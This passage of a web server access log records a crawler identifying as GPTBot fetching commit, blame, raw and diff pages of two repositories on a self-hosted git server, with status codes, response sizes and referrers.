+0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 74.7.227.38] [Length 10149] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" -[17/Feb/2026:13:10:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 74.7.227.38] [Length 11851] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" -[17/Feb/2026:13:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" [Client 74.7.227.38] [Length 9984] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.gitignore" -[17/Feb/2026:13:10:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/nginx.conf" -[17/Feb/2026:13:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt" [Client 74.7.227.38] [Length 9916] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt" -[17/Feb/2026:13:10:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" -[17/Feb/2026:13:11:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" -[17/Feb/2026:13:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/services/geminiService.ts" -[17/Feb/2026:13:11:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" [Client 74.7.227.38] [Length 778] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/ReadMe.txt" -[17/Feb/2026:13:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" [Client 74.7.227.38] [Length 4659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/watchdog.py" -[17/Feb/2026:13:11:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/services/geminiService.ts" -[17/Feb/2026:13:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13140] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services" -[17/Feb/2026:13:11:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13143] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services" -[17/Feb/2026:13:11:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10984] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs" -[17/Feb/2026:13:11:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.patch" [Client 74.7.227.38] [Length 32986996] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:11:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" [Client 74.7.227.38] [Length 13933] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:13:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 400218] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:11:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 62480] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=split&whitespace=show-all" -[17/Feb/2026:13:11:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 57840] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:11:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 400463] [Gzip 13.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 84518] [Gzip 12.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:11:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 57839] [Gzip 10.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12937] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" -[17/Feb/2026:13:11:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12937] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" -[17/Feb/2026:13:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10933] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:11:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9969] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/e54b4e832455afb83987fc146872a66900dee5c0" [Client 74.7.227.38] [Length 7491] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:13:11:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" -[17/Feb/2026:13:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" -[17/Feb/2026:13:11:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/services/geminiService.ts" -[17/Feb/2026:13:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/services/geminiService.ts" -[17/Feb/2026:13:11:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" [Client 74.7.227.38] [Length 287] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/localpycs/struct.pyc" -[17/Feb/2026:13:11:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 77466] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:11:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 77450] [Gzip 10.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 458465] [Gzip 15.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:11:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues" [Client 74.7.227.38] [Length 10077] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/forks" -[17/Feb/2026:13:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/labels" [Client 74.7.227.38] [Length 7610] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" -[17/Feb/2026:13:11:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" [Client 74.7.227.38] [Length 15599] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:13:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" [Client 74.7.227.38] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/App.tsx" -[17/Feb/2026:13:11:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d.diff" [Client 74.7.227.38] [Length 2501] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 74.7.227.38] [Length 13140] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" -[17/Feb/2026:13:11:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 22229] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:11:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 22232] [Gzip 4.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d" -[17/Feb/2026:13:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 22960] [Gzip 5.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/63aec54418d3c1735d68bf046c7a9e78a247798d?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:11:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" -[17/Feb/2026:13:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" [Client 74.7.227.38] [Length 14801] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977" -[17/Feb/2026:13:11:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" [Client 74.7.227.38] [Length 11946] [Gzip 5.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/PostgresWatchdog.spec" -[17/Feb/2026:13:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest" [Client 74.7.227.38] [Length 11657] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:13:11:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/2681563c08aa04fbea2862fbca273762e67c16d6" [Client 74.7.227.38] [Length 7508] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6" -[17/Feb/2026:13:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 7501] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:11:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 74.7.227.38] [Length 7494] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a" -[17/Feb/2026:13:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 74.7.227.38] [Length 12934] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" -[17/Feb/2026:13:11:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" -[17/Feb/2026:13:11:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" [Client 74.7.227.38] [Length 1787] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services/geminiService.ts" -[17/Feb/2026:13:11:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 213404] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:11:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 11102] [Gzip 4.16] [Sent-to 192.168.0.250] "Mozilla/5.0 